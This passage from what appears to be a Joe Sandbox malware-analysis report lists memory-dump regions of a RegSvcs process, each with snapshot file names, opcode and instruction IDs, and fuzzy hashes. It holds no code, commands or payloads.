                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f8bdb867b758d736bd32cb33fef5b20e756003a734c4b95751e2f71a3715da6
                                                        • Instruction ID: 8cf52ee31114fa96bffaeb6423b97f786c9a0dfd7384c89c7df8bf44c6662041
                                                        • Opcode Fuzzy Hash: 3f8bdb867b758d736bd32cb33fef5b20e756003a734c4b95751e2f71a3715da6
                                                        • Instruction Fuzzy Hash: 80638D30F416268FDB645B69982437FB6E6AFC8660F64846AD906D7384DFB0CC42CBD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,k%q$,k%q
                                                        • API String ID: 0-123747685
                                                        • Opcode ID: 7959ea5e4884dd684d11c169497bd7f0c692a8e3f7f45feaff06e466b8122136
                                                        • Instruction ID: 22fbb33c7461ae42271163b86d004e3bc402c1f0a3f2dfb336723522d751b34a
                                                        • Opcode Fuzzy Hash: 7959ea5e4884dd684d11c169497bd7f0c692a8e3f7f45feaff06e466b8122136
                                                        • Instruction Fuzzy Hash: 4A329D34B116058BE359EF68D554B6F7BA2FBC8704F608469DA07EB394CF389C068B91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,k%q$,k%q
                                                        • API String ID: 0-123747685
                                                        • Opcode ID: e7cfc7120c8cb1866c09ec429e5e79e456236518bae31914429546f8e57e8ccc
                                                        • Instruction ID: 32fe2a8c18ba969878f826ae989b5cce9ec2273ce3592cf2d96dc1668049f852
                                                        • Opcode Fuzzy Hash: e7cfc7120c8cb1866c09ec429e5e79e456236518bae31914429546f8e57e8ccc
                                                        • Instruction Fuzzy Hash: 26328D34B116058BE359EF68D554B6F7BA2FBC8704F608469DA07EB394CF389C068B91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,k%q$,k%q
                                                        • API String ID: 0-123747685
                                                        • Opcode ID: 625d205081beb59c0fd548cd9bd7d6375b6c9d0bfb303f2eb33ae8d59ebaa88c
                                                        • Instruction ID: 1aabc18679bfc8a855e005be9b4dffae9bb32563f3fe9dc7af7c5dc653407c79
                                                        • Opcode Fuzzy Hash: 625d205081beb59c0fd548cd9bd7d6375b6c9d0bfb303f2eb33ae8d59ebaa88c
                                                        • Instruction Fuzzy Hash: 2C328C34B116058BE359EF68D554B6F7BA2FBC8704F608469DA07EB394CF389C068B91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,k%q$,k%q
                                                        • API String ID: 0-123747685
                                                        • Opcode ID: 9a4b357a2f805fa699fd74c8da4fec5264e52b940adfd5fb2e9afdbb9e37e727
                                                        • Instruction ID: 998c2bc5556a0a5bc118040d066b07981c4d0b0e25262209426f2a87317832ad
                                                        • Opcode Fuzzy Hash: 9a4b357a2f805fa699fd74c8da4fec5264e52b940adfd5fb2e9afdbb9e37e727
                                                        • Instruction Fuzzy Hash: 11227A34B116058BE359EF68D554B6FBBE2FBC8304F608469D646EB394CF389C068B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83a618345f339743a11f215aac5684a5b3adb408d442e1b2b822e48d7693a9fc
                                                        • Instruction ID: 56a49f83acad8b495d385d1e21436f78ad1c106385856953ca06a470bd815de8
                                                        • Opcode Fuzzy Hash: 83a618345f339743a11f215aac5684a5b3adb408d442e1b2b822e48d7693a9fc
                                                        • Instruction Fuzzy Hash: A9B29E30A042159FD7149F69C859BAABBBAFFD4708F10846EE60697394CFB08D49CF61
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 756de957ed3328145bcd02671188672ac3393e242ca21f0e8b4b0f3c2378eb69
                                                        • Instruction ID: 198086409e9bf27b21dcb5256db02d7658773bbefb204e7461ec737256a74b63
                                                        • Opcode Fuzzy Hash: 756de957ed3328145bcd02671188672ac3393e242ca21f0e8b4b0f3c2378eb69
                                                        • Instruction Fuzzy Hash: E3820974A102299FDB65DF68C944BAEBBB2FF88300F5081E9E409A7354DB349E85CF50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d70e93aa42e987e072e243d3f077265c99bb31826b7a93c28caeda2101bce21e
                                                        • Instruction ID: f26946cc82368cfcaf1f307608c45d96b8cd0c04d7d29c870826b9f8a4cb9aca
                                                        • Opcode Fuzzy Hash: d70e93aa42e987e072e243d3f077265c99bb31826b7a93c28caeda2101bce21e
                                                        • Instruction Fuzzy Hash: 6E124C30A007058FDB29DF78C450A9EB7B2FF89714F648A29D4069B791DB71EC86CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daed47ce52548c555aea26d5c6a518c3f397a327ed47c485c7748234cca3bd69
                                                        • Instruction ID: af5d2a098d9fa73cd4bfc26291d851b16ee154eecfbd9db070371c0ad2349f94
                                                        • Opcode Fuzzy Hash: daed47ce52548c555aea26d5c6a518c3f397a327ed47c485c7748234cca3bd69
                                                        • Instruction Fuzzy Hash: 910269747102028FD764EF68D85063F7BE2FB98344B648439E946AB794EE3E9C01CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70191e6f3c8e92424fde94a959e6c84c76b62a2c33f1d60b30f035581fa34452
                                                        • Instruction ID: 42d47974fb94f02a6585a2b8b6c894c16a4c9152ed37ae385911d0c380344d78
                                                        • Opcode Fuzzy Hash: 70191e6f3c8e92424fde94a959e6c84c76b62a2c33f1d60b30f035581fa34452
                                                        • Instruction Fuzzy Hash: 11E15034B103058FDB15EFA4D998AAEB7B6FB88300F608139D606A7394DF799D05DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a211e6f8d78753184899bc1e0b21753a0ffdc605c643c4a0a7b16823717f29ce
                                                        • Instruction ID: ffae67005ee21d0738352b86d9a07dcf426ef7808b9aeb12f5c138b95a05ab1b
                                                        • Opcode Fuzzy Hash: a211e6f8d78753184899bc1e0b21753a0ffdc605c643c4a0a7b16823717f29ce
                                                        • Instruction Fuzzy Hash: FBE13B75A0020ACFDB24EF68D894AAEB7F2FF88310F044569D506AB361DB75AD05CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31036cd259872a9f763df2e44eef8bcd48dfea3c1f61657c8f3bdf5d77e3590b
                                                        • Instruction ID: c714ea729e7d33c7e0eb8470e09cfb2f293f68cb3d83c1e29c574df6d4da0344
                                                        • Opcode Fuzzy Hash: 31036cd259872a9f763df2e44eef8bcd48dfea3c1f61657c8f3bdf5d77e3590b
                                                        • Instruction Fuzzy Hash: 66E14B74A102189FDB55DF64D944BEEBBB6FB8C300F1080A9E509AB394DE749E85CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac841253b17e4a33675b7e901e3d2b11ef67e31a0ca216e926e99bcf7d9cc185
                                                        • Instruction ID: 7bf4a846a85153176e5d01a5fa7b59957ed3cd15678be39135a17414db6166f9
                                                        • Opcode Fuzzy Hash: ac841253b17e4a33675b7e901e3d2b11ef67e31a0ca216e926e99bcf7d9cc185
                                                        • Instruction Fuzzy Hash: F1E15D74A0020ACFCB14EFA8D494AAEB7F2FF88314F108569D516AB361DB75AD05CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 827c33c712ba61e6aa6465aec4900565ed37398e569e9b162022bf26f6f5c406
                                                        • Instruction ID: 4791ad52228f3ac1b1e5f9296ab272c61e5f94387eae3961fedd39ae53236237
                                                        • Opcode Fuzzy Hash: 827c33c712ba61e6aa6465aec4900565ed37398e569e9b162022bf26f6f5c406
                                                        • Instruction Fuzzy Hash: 35B16D34F41A068F8B15AB65A45437EBBA7FFE8658764881AC807C7344EF30DC16CB96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7cc2ee6ff241715bcc72fd62200b244830a31c26d8f0273c20bdc3653aca24af
                                                        • Instruction ID: c941b2ca7a667ec1b342c2cc96d00d161129c11e31a3518516a80712ea196ed7
                                                        • Opcode Fuzzy Hash: 7cc2ee6ff241715bcc72fd62200b244830a31c26d8f0273c20bdc3653aca24af
                                                        • Instruction Fuzzy Hash: 3AB16C70E002099FDF24CFA8D9857AEBBF2BF48704F149129D815A7394EB749855CF91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0734af5139312707fed6392e22538c72f042fb0bd09f672517dfa8e7ec0b38c
                                                        • Instruction ID: 5287cb0ed5a7294373b6cb9ec77a6d9d15670f844d20f722703be9427e6bbdb6
                                                        • Opcode Fuzzy Hash: a0734af5139312707fed6392e22538c72f042fb0bd09f672517dfa8e7ec0b38c
                                                        • Instruction Fuzzy Hash: 16B19C70E00219DFDF14CFA8C8857AEBBF2BF48714F249129E815AB794EB749851CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f01dba1d9762729888d813ab51bcd08a242916b1d9d03ad1416f0d1f15b3027
                                                        • Instruction ID: 1d6a2fcb47b0d001a3da007bfbd980ac8fc4c5e4b5033c00bc83287ea55a6c03
                                                        • Opcode Fuzzy Hash: 2f01dba1d9762729888d813ab51bcd08a242916b1d9d03ad1416f0d1f15b3027
                                                        • Instruction Fuzzy Hash: 0DA15034B106148FC715DF64D580A6FB7B6FF88710F14812AE942AB364DB38ED46CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2439c9d4f49aec2ad27e0d1ab076e75259426fb1c3d264085aab1d2f1883f4f3
                                                        • Instruction ID: 4d7f2d955351d3aae9af52e7ea1ea34f3d302cf7e6c3938eef2439b6eddd38d1
                                                        • Opcode Fuzzy Hash: 2439c9d4f49aec2ad27e0d1ab076e75259426fb1c3d264085aab1d2f1883f4f3
                                                        • Instruction Fuzzy Hash: C231D6352143449FD355EB69D444AABB7F6BFC5220B18CA6DD086CF791DB30D809CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ae8e6c98abf833d0048a9297bbb2ff535f452494206e455d539e45aff27d665
                                                        • Instruction ID: c47cdd4dc30ba00f9bf55563b46ff90043a303e1ac538ab61e2a33948d0ee677
                                                        • Opcode Fuzzy Hash: 8ae8e6c98abf833d0048a9297bbb2ff535f452494206e455d539e45aff27d665
                                                        • Instruction Fuzzy Hash: 49919230B006059BDB25EFA8D558AAEB7B7FBC8300F208129D50277394DF7A9C46CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a334020c16fbf4b7d843c5c1b7be59c91979d4c2667b612fb4430d16d6bbdc4
                                                        • Instruction ID: 3dd42e603d15ac9d06f0a3c441521e3e97a7f9473b6b7d7a48a2460426170e19
                                                        • Opcode Fuzzy Hash: 7a334020c16fbf4b7d843c5c1b7be59c91979d4c2667b612fb4430d16d6bbdc4
                                                        • Instruction Fuzzy Hash: A9918E70E002099FDB24CFA8C8857AEBBF2FF58714F149529E416A7790EB749842CF95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baa74f556168868e57a5ac5dbc2f0568d4ef0621eae9569017d24c9217d72a63
                                                        • Instruction ID: 0b68acb1df0ec1585d204ebe4198df0a0cb883bbde14326883517a5eb54e5038
                                                        • Opcode Fuzzy Hash: baa74f556168868e57a5ac5dbc2f0568d4ef0621eae9569017d24c9217d72a63
                                                        • Instruction Fuzzy Hash: 3691FB74A04215DFCB18DFA9C594AAEB7B2BF88314F24966DD4069B3A1CB31ED42CF50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54d8fb4f0e5f6009b7bb03bb9495115e1a99965aa500ec9262ad47bc026a16ae
                                                        • Instruction ID: bb61359bdeb71968a6b0c687ece2c4cfb2bda685716e9c4e2c22b3bde402a303
                                                        • Opcode Fuzzy Hash: 54d8fb4f0e5f6009b7bb03bb9495115e1a99965aa500ec9262ad47bc026a16ae
                                                        • Instruction Fuzzy Hash: 6281B1706002099FD704EF68E9947AFB7F7FF88224B104429C50AA73A5DF79AD05CB95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1f14658440820942ae4070ca41ce780cbaef85ac508a47f589fb4281246f7f
                                                        • Instruction ID: cfd55895028d35eb73adf91747dbac4498cc48b16fa4f8c8e6b6f7f5409866c7
                                                        • Opcode Fuzzy Hash: 1f1f14658440820942ae4070ca41ce780cbaef85ac508a47f589fb4281246f7f
                                                        • Instruction Fuzzy Hash: 7661CB31710341ABD7549F26C8D9A3FFBABBFC8218B45887E920687748CF769C099B51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d445d32fc6c2b7f8a68fcc2e34cc89a397d66be4467d2235a4c4a96ea60bc535
                                                        • Instruction ID: e75097ab7f6f2dfd2e8c6d6baaaea81f003ead01b47a1783029f49ece38a24d3
                                                        • Opcode Fuzzy Hash: d445d32fc6c2b7f8a68fcc2e34cc89a397d66be4467d2235a4c4a96ea60bc535
                                                        • Instruction Fuzzy Hash: 8771B230B006059BDB25EF68D5589AEB7B3FBC9300F208129D60267394EF799D46CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cfcf8b1d6815c34bd046efd5523ad45dfdcd13d03ecdc64e2dc227ea9b647d2
                                                        • Instruction ID: 2ee590ad590501c8a08b4beb035cfbd3ec1249adf2c8a1c77396ef6637535797
                                                        • Opcode Fuzzy Hash: 4cfcf8b1d6815c34bd046efd5523ad45dfdcd13d03ecdc64e2dc227ea9b647d2
                                                        • Instruction Fuzzy Hash: CC518B31710301ABD754AF26C4D9A3FF7ABBFC861CB85883D960687748CF76AC099A51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4eec0813557d1136976bb964c3c7ed15e4beb1cde18216852f88b0cf1e70704
                                                        • Instruction ID: ea57301b9acd559ad16f5154b27a73aac8136fb6a7a60b7e3c0d8068eb751f0a
                                                        • Opcode Fuzzy Hash: d4eec0813557d1136976bb964c3c7ed15e4beb1cde18216852f88b0cf1e70704
                                                        • Instruction Fuzzy Hash: CF51D75245D3945FF316AF68DC617C73FA58F96264F1A00A7D880CB393E91C8C0AC6B6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 201391f5035c30f8d7b2be47f3401c3b3ed4e6c4147296f07109a8350f085d13
                                                        • Instruction ID: 5a8b41e53f09958803e61b20c8c2987283cdc0674f74d36b5f0fc091493737aa
                                                        • Opcode Fuzzy Hash: 201391f5035c30f8d7b2be47f3401c3b3ed4e6c4147296f07109a8350f085d13
                                                        • Instruction Fuzzy Hash: E9612835B0020A9FDF15CFA8D8449EEBBF6FF88210B14816AE909E7250D735DD21DB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e40e9b79822ccfaacf7d99ee2529210bea9ba6936512771520c0b3b5b8326f85
                                                        • Instruction ID: 7e068903feab982c763f5b42f4de30bce30a61265c4bc210a1872d4f7509072c
                                                        • Opcode Fuzzy Hash: e40e9b79822ccfaacf7d99ee2529210bea9ba6936512771520c0b3b5b8326f85
                                                        • Instruction Fuzzy Hash: 62617734A006158FCB14DF29D594A99BBF2FF88314B1681A8E816EB362DB75FC05CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51671336c56dbdd36dfc38ede9c81e6588b5d0a34832841eb74e1d45b858a47e
                                                        • Instruction ID: c67f969701e17c243a1c8c91bac48a886a365ccd3a0ce7c30d07f2eb74a7f320
                                                        • Opcode Fuzzy Hash: 51671336c56dbdd36dfc38ede9c81e6588b5d0a34832841eb74e1d45b858a47e
                                                        • Instruction Fuzzy Hash: BB515F3160030A8FDB14EF69D884AAAB7F2FF88354F548568D915AB761DB75ED00CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fdf86e2c761c964cc15c768dc599ffe64d5d02a2c266b5966fde3ff0150d78a
                                                        • Instruction ID: 33aee26a462394d65c98bf4b170fa9fdd5bb3a6a04b18fa9de950aac9d6186c1
                                                        • Opcode Fuzzy Hash: 7fdf86e2c761c964cc15c768dc599ffe64d5d02a2c266b5966fde3ff0150d78a
                                                        • Instruction Fuzzy Hash: 3651C230B007158BDB54DF68D854B6F77E6FB88714F10C028EA06AB394CF78AC068B96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21cfd8aacb2be4e7938b70fcdb861f05bb855808bc744794025f1f4deadb07c7
                                                        • Instruction ID: e3abeeaf64dfa6e931fa0a3bab9fd1f0e6d0d9bdb633c02c62bae11e206d1985
                                                        • Opcode Fuzzy Hash: 21cfd8aacb2be4e7938b70fcdb861f05bb855808bc744794025f1f4deadb07c7
                                                        • Instruction Fuzzy Hash: D8517E316003068FDB24EF69D894AABB7F2FF88354B444568E9069B761DB79ED04CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aad9eaaca1812aee9f66a86164e1177cf8bd918a138866f68fe6ba5d50e7b6f2
                                                        • Instruction ID: 9401c5197d2c1a1741810381902fb47a578007cc38cf22d1caf90294b73706f7
                                                        • Opcode Fuzzy Hash: aad9eaaca1812aee9f66a86164e1177cf8bd918a138866f68fe6ba5d50e7b6f2
                                                        • Instruction Fuzzy Hash: B0512B76600104AFCB45DFA8D954D6ABBB7FB8C31471580A8E20A9B3B5CB36DC22DF51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c4a654664ec0cfeb91d6baecbcbc8eaf198a5b945ada6318be32007f49070b5
                                                        • Instruction ID: 51512badc1310485880efde44926fd5917e4f1bc8d6ef71eadb6029ded74e7a8
                                                        • Opcode Fuzzy Hash: 0c4a654664ec0cfeb91d6baecbcbc8eaf198a5b945ada6318be32007f49070b5
                                                        • Instruction Fuzzy Hash: A451AD74B012168FDB15DF68D55466FBBF6FB84308F208038D60AA7394DB38AD46CB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e1782431de12462cc01b24accce20d007cd93d69670a309d48532e81a34222a
                                                        • Instruction ID: cfa9a9ffb72d84a421641bba10df8b733138f0316507aa501820d641c905992f
                                                        • Opcode Fuzzy Hash: 1e1782431de12462cc01b24accce20d007cd93d69670a309d48532e81a34222a
                                                        • Instruction Fuzzy Hash: CA517E36600505DFCF06AFA4E908CAD7BB3FF8C3007158195E605AB272DB3AD965EB81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4580e375d4948b85b729f81e1da47cd7799c91530d863462db8b23398e1cfa0b
                                                        • Instruction ID: 7decf282ac2b24347a77d60dd7b5e13de5035a2fe272705e2f03c138779bfeba
                                                        • Opcode Fuzzy Hash: 4580e375d4948b85b729f81e1da47cd7799c91530d863462db8b23398e1cfa0b
                                                        • Instruction Fuzzy Hash: A7519F3060020A9FD714EF64E9857AEB7E3FF88314F108828C5066B7A5DF79AD05CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 779c19c1bea26a37e1371a42018cf1b7333dad58b262ca47167512b8b15c3a5a
